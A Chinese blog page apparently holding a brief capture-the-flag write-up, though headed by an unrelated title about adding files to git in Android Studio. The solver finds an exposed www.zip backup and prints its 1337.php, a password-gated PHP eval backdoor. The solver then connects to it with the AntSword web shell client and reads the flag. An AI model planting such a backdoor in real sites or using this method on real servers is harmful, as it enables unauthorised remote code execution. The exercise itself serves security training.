0
点赞
收藏
分享

微信扫一扫

android studio 把unversioned文件加入git

小蓝同学给你发来了他自己开发的网站链接,
他说他故意留下了一个压缩包文件,里面有网站的源代码,
他想考验一下你的网络安全技能。
(点击“下发赛题”后,你将得到一个http链接。如果该链接自动跳转到https,请手动将其改为http再进行访问。)

题目

  1. 通过扫描工具扫出该网址下有www.zip文件,下载后查看其中的1337.php
    1337.php
<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){
   eval($_POST['1337']);
}

可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’
HACKBOOK
输入密码,通过蚁剑进入SHELL
shell

连接成功
进入根目录,找到flag
flag
flag text
成功夺旗!

举报

相关推荐

0 条评论